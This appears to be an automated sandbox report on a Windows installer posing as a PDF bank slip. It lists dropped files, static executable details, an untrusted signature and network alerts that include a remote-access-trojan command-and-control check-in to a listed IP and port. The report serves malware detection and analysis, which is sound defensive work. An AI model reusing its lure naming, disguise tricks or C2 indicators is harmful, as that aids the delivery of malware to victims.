Preview:	SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSrSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSzSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\shelterdkket.ini

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 533x446, components 3
Category:	dropped
Size (bytes):	52786
Entropy (8bit):	7.962857127944489
Encrypted:	false
SSDEEP:	768:wZ/3DFw2xqdcg2FuwRj6hSnepGUbTTGj4CtO90G+ENaaWz9eZSYBSUWW:wZ/3pw2xWZdxhqep2EsXG+E0mfBSUZ
MD5:	F38DF75487DD92BCF11B4A351ABAF48F
SHA1:	203F8CCBD1DD7EE37FBF16B7893725D524AE360F
SHA-256:	7179E6ECC9847E743AE50CF83323ED90683A162ADD45F31C751C992EDF17997A
SHA-512:	A6E8FB49B8FFAFFCFF3F90142D11670F38009B9833508260F96371473409ECF9F25676B8543CC787B7B30D6C1185DD0BFA1EFD61628E683D36C316A4A5A3B9DF
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z._....j6...............}k.f...?.....^..`..Q..a.........-......H..9.{4\|.t}X..2...7.SN....i..{..W....XV#.>a.4\|.....B..!...............}.\|..g.]......y.3......^.?3_CM....>.d}.@.....\..bF=VF_.G2'..2..?..>O.....Y..?...{.o.}_....".<R..e...9..Y.....R......?.z..4O.!......7......B$... ...M...?...'...._...Z....a ...KV.[.......O.8.....\|.{s.`kF=&9~.

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\udgiftsfres.env

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3807106
Entropy (8bit):	0.1577312789348345
Encrypted:	false
SSDEEP:	768:nuYBrW8hqhoxCWQWBZwS/E1Cg1J0bOMuhJbyFo1u7ecpqzWC7OG0wqd34vEvzEGr:87sd
MD5:	8D83AB5DAA6ADE122E34F9B92AEBDCBB
SHA1:	5E69F7061B7FA090B0CECA5D671D96A7814FC6F7
SHA-256:	F5F6842C864ACA444EC55BE5136DFF521ECE4AC787ACCCF09EA3B1E8CA008D3A
SHA-512:	98DC39FD5A68573B45E3A8D43D2BE136A5F315CCB7929732ECA1986DBD4FA55573407C4C805D06DE844750D1FB02118D2592AE9861BAADDE58DF5766F67F2E98
Malicious:	false
Preview:	SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSDSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS..SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS9SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSScSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSDSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSzSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSESSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\Frerhold.txt

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	347
Entropy (8bit):	4.350398851045762
Encrypted:	false
SSDEEP:	6:ozIv+4F8w7zieEWSoLryayrxRcvMGXTEeZa12r2BULhAI+3nOw+ixDCX:oy+47nie/IxOvHXT3NqSLPAp+/
MD5:	5386FB7E3D12D93EC0284B943A6A43FA
SHA1:	E09B34A2034B976883BC50810F18C7B18B88E82E
SHA-256:	D2B96A6F36627B945492B5AD960B3E12281310E6F7287130866F824A230E2672
SHA-512:	4930A64AB3B036FA7B60C3FF38F6E1762E0ED289F85C8A6EBF179AE1993E47994C0EAF56D393728C482605C316E7BE9C41BC0E43DB3AB108420785F8DFB8EF62
Malicious:	false
Preview:	;centralizations stoppe grundmure astmaens.Snebold dsb unniggardly nimbuses hypercorrectness......grntfoderets mandarinens aktivistgruppen dissentment tekstilarbejderen incitere.Pansres gussied semicircles demicannon paddled anterethic....;tildeling svededraabens fokkemaster,hemmeligholde glycogenic labyrints finmarks strstemaalets revivalises..

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\afdelingsjordemoder.jpg

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 533x446, components 3
Category:	dropped
Size (bytes):	51260
Entropy (8bit):	7.967517242598145
Encrypted:	false
SSDEEP:	768:wZ/3DFw2xqdcg2FuwRj6hSnepGUbTTGj4CtO90G+ENaaWz9eZSYBSUe:wZ/3pw2xWZdxhqep2EsXG+E0mfBSUe
MD5:	07AD72871AFA0B6CF52D55AD19D3215E
SHA1:	216347977E690A008E9B0A730A2FD65A80248244
SHA-256:	B43882C1DFA75B93AAF4BF30BFBC76443F9AF0872C8A1438655F6C4AC2DC03B3
SHA-512:	64DBEA654C6AB955907DEEA0BCC3468FD5175EAB757613781E5F68EAA575434763E34A96CFA4964C571642C7116E0EE47935A80204F4D5BFC1E82F845CF62553
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z._....j6...............}k.f...?.....^..`..Q..a.........-......H..9.{4\|.t}X..2...7.SN....i..{..W....XV#.>a.4\|.....B..!...............}.\|..g.]......y.3......^.?3_CM....>.d}.@.....\..bF=VF_.G2'..2..?..>O.....Y..?...{.o.}_....".<R..e...9..Y.....R......?.z..4O.!......7......B$... ...M...?...'...._...Z....a ...KV.[.......O.8.....\|.{s.`kF=&9~.

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\bilfragternes.txt

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 533x446, components 3
Category:	dropped
Size (bytes):	52057
Entropy (8bit):	7.96698938148899
Encrypted:	false
SSDEEP:	768:wZ/3DFw2xqdcg2FuwRj6hSnepGUbTTGj4CtO90G+ENaaWz9eZSYBSUl:wZ/3pw2xWZdxhqep2EsXG+E0mfBSUl
MD5:	66BBEA8F1EEA15C013EB25F6502B1F71
SHA1:	849E64E7152D856961CEF8BB3B8E77EFD63D0F78
SHA-256:	10B0681E8D4F2E9552F41CF0B66DCC8EC68783A1F049225BC33D48D7023EC162
SHA-512:	BE5E8692F652058ECB889DB193890D607E4834ECFBF0B058E003EF13A5E833BE4627AD54476A306ADE34DE4969A85728F8D6BD8321E7DE1C5A3395333FFFD5A6
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z._....j6...............}k.f...?.....^..`..Q..a.........-......H..9.{4\|.t}X..2...7.SN....i..{..W....XV#.>a.4\|.....B..!...............}.\|..g.]......y.3......^.?3_CM....>.d}.@.....\..bF=VF_.G2'..2..?..>O.....Y..?...{.o.}_....".<R..e...9..Y.....R......?.z..4O.!......7......B$... ...M...?...'...._...Z....a ...KV.[.......O.8.....\|.{s.`kF=&9~.

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\carboxyl.jpg

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 458x85, components 3
Category:	dropped
Size (bytes):	12730
Entropy (8bit):	7.964207911019508
Encrypted:	false
SSDEEP:	384:mrQbHgnn3XNNeAu08MhGPfXJG2rUGu0RfGQuMe:m0bin3XfeJj+GHXJLrE0wX
MD5:	CA1A8EDC0794AA2F7E00F2DA5DB8AC4F
SHA1:	84FFFD19C24DBD5B449C887C4F016186B03613F1
SHA-256:	4101F99D245745BE531F788DBDAAC5731165DD771AF2B903FCBD984259E7CF90
SHA-512:	0857967C6363BCBA28C22476A1DF152C117967F7C0525675ABCC70551F5DFB728BBD499296950E5D6A67281D8368D0EC6EFB517165D0FAADD1CFCDD9B56D733B
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......U...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.."....Q`..mef ....;.....7..m.k.. P....\..r.I...]K/...;9.}.......z...v.i.7....$m...GS.\..}I.]QG..k..L.v.+..,e........+I.$......$.H...j.......4.m.[1U..OZ..R..X..Oh..CI)-...}....g...$.;.>O.F.=.1...)%..........Ztv&I.....8...O..j..j...j....G....7..r{.m.....\L....O.......4..].F?:..4..B.6.c}.L..:.<..... e"Fo.'.'m...;\0PUq.*....k.X..@.?.X.".V..]I..UA#...W.M..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Diathermance.lnk

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1122
Entropy (8bit):	3.178956461589912
Encrypted:	false
SSDEEP:	12:8wl0SsX2lw/tz+7RafgKDPxpgRk14xROQ1UYokQ9JMmDae7/+CNJkKAb4t2YZ/eJ:8ZTaRMgKrgywP5WomDaeTPHAJqy
MD5:	6251F8764004F06ADC844BF0D83B462C
SHA1:	F6200E4FDC02A3C28DD50D0F83DA3E8D29855DEA
SHA-256:	94327A6EB0C57D084819484702C76B2A900A57A63033DB763A1530854D0A4EAA
SHA-512:	F7B6BC5CC5631AADA287CA041E201C60DE8DEB7B60BCF5A20ADB4C3F6C945ACFA56A26F3C22E78D2730E39C364AD38EC38B85E0E160311E132986EF0A698F6C2
Malicious:	false
Preview:	L..................F........................................................E....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....x.2...........flannelmouthed.fre..V............................................f.l.a.n.n.e.l.m.o.u.t.h.e.d...f.r.e..."...).....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.f.l.a.n.n.e.l.m.o.u.t.h.e.d...f.r.e.X.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.r.d.e.r.\.u.n.a.c.q.u.i.s.i.t.i.v.e.n.e.s.s.\.s.k.a.l.d.y.r.s.a.l.a.t.e.r.s.\.O.p.i.n.i.o.n.s.m.a.a.l.i.n.g.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.911680237724091
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BANK SLIP_TT COPY 2-13-2024_pdf.exe
File size:	971'664 bytes
MD5:	7351c20933cdb70bb83cce6725f74fdc
SHA1:	83dc17dfc1058b369b27f09c560095346d7b6b6b
SHA256:	831671a9ee0a11c89793297f87ac535e049e1ea31b02a4a162bd4b103c44a667
SHA512:	e2834934ca6de2d8a318ad66d0ff072d0621dbcbcc595296785a97830f370f057fae4d41799ca0b6b42db73ef28f91e5df87efc6784d47afe09b259c98e98aa4
SSDEEP:	24576:iPx/Z54JgkWFewWogaYwnQnb7O0lo9arWoEL:qx/Z5hkCe9G87JlEare
TLSH:	8A25234A2FCDFC33D39C74BC19AACBCD9B764C901B2653B3AF441B6D6624B51680918E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....

File Icon


Icon Hash:	7c5a1751616e4646

Static PE Info

General

Entrypoint:	0x403180
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=argusjnes, E=Tommas@Bandrol.Net, O=argusjnes, L=Braco, OU="Subjektivismens Forlagslederen Delmodigste ", S=Scotland, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	27/08/2024 01:24:25 27/08/2025 01:24:25
Subject Chain	CN=argusjnes, E=Tommas@Bandrol.Net, O=argusjnes, L=Braco, OU="Subjektivismens Forlagslederen Delmodigste ", S=Scotland, C=GB
Version:	3
Thumbprint MD5:	174ED01D7929D432B0FC8ECA00406992
Thumbprint SHA-1:	1F91D244BBA969A6A6368C84D8B3EE51CD821A52
Thumbprint SHA-256:	B7E7C89145A9EE2FA3C10BAA885BD6B5029689C242EF3707822A54B1288CBD02
Serial:	6CD157469186C2F578BE26F6D0F65E0B21CA9E01

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F718080E443h
push ebx
call 00007F71808113B1h
cmp eax, ebx
je 00007F718080E439h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F718081132Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F718080E41Dh
push ebp
push 00000009h
call 00007F7180811384h
push 00000007h
call 00007F718081137Dh
mov dword ptr [007A1F44h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [007A1FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079D500h
call dword ptr [00407174h]
push 00409188h
push 007A1740h
call 00007F7180810FA7h
call dword ptr [0040709Ch]
mov ebp, 007A8000h
push eax
push ebp
call 00007F7180810F95h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3be000	0x2dde8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xeb458	0x1f38	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e4a	0x6000	30c42419b2e69d0fb178ad82fde5a6a6	False	0.6707356770833334	data	6.461674766148295	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	43fab6a80651bd97af8f34ecf44cd8ac	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x399038	0x400	295703f29cbf0cc87537f54786ed1d01	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a3000	0x1b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3be000	0x2dde8	0x2de00	48f821e7ba857eb12c94f18ece416e76	False	0.8008504342643051	data	7.346190637570017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x3be370	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x3be6d8	0x1892a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000407352210631
RT_ICON	0x3d7008	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.5585147284987578
RT_ICON	0x3e7830	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6385892116182572
RT_ICON	0x3e9dd8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6822232645403377
RT_ICON	0x3eae80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7774822695035462
RT_DIALOG	0x3eb2e8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3eb430	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x3eb570	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3eb690	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3eb7b0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3eb878	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3eb8d8	0x4c	Targa image data - Map 32 x 35114 x 1 +1	English	United States	0.8026315789473685
RT_VERSION	0x3eb928	0x180	data	English	United States	0.5807291666666666
RT_MANIFEST	0x3ebaa8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description	Data
Comments	brnefilm
LegalCopyright	eleidin
LegalTrademarks	tortil haster
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-14T19:50:13.340609+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	51519	172.217.18.14	443	TCP
2025-02-14T19:50:19.337704+0100	2859902	ETPRO MALWARE Win32/zgRAT CnC Checkin	1	192.168.2.6	51534	46.161.0.101	16631	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 19:49:50.415600061 CET	56665	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:49:50.420453072 CET	53	56665	1.1.1.1	192.168.2.6
Feb 14, 2025 19:49:50.420878887 CET	56665	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:49:50.425704956 CET	53	56665	1.1.1.1	192.168.2.6
Feb 14, 2025 19:49:50.866904974 CET	56665	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:49:50.873733044 CET	53	56665	1.1.1.1	192.168.2.6
Feb 14, 2025 19:49:50.873914957 CET	56665	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:06.998255014 CET	51486	53	192.168.2.6	162.159.36.2
Feb 14, 2025 19:50:07.003484011 CET	53	51486	162.159.36.2	192.168.2.6
Feb 14, 2025 19:50:07.003593922 CET	51486	53	192.168.2.6	162.159.36.2
Feb 14, 2025 19:50:07.008480072 CET	53	51486	162.159.36.2	192.168.2.6
Feb 14, 2025 19:50:07.486665010 CET	51486	53	192.168.2.6	162.159.36.2
Feb 14, 2025 19:50:07.491723061 CET	53	51486	162.159.36.2	192.168.2.6
Feb 14, 2025 19:50:07.491780996 CET	51486	53	192.168.2.6	162.159.36.2
Feb 14, 2025 19:50:12.235402107 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:12.235454082 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:12.235553980 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:12.294646025 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:12.294680119 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:12.936474085 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:12.936698914 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:12.937269926 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:12.937385082 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.026973963 CET	51519	443	192.168.2.6	172.217.18.14
Feb 14, 2025 19:50:13.027014017 CET	443	51519	172.217.18.14	192.168.2.6
Feb 14, 2025 19:50:13.027410984 CET	443	51519	172.217.18.14	192.168.2.6
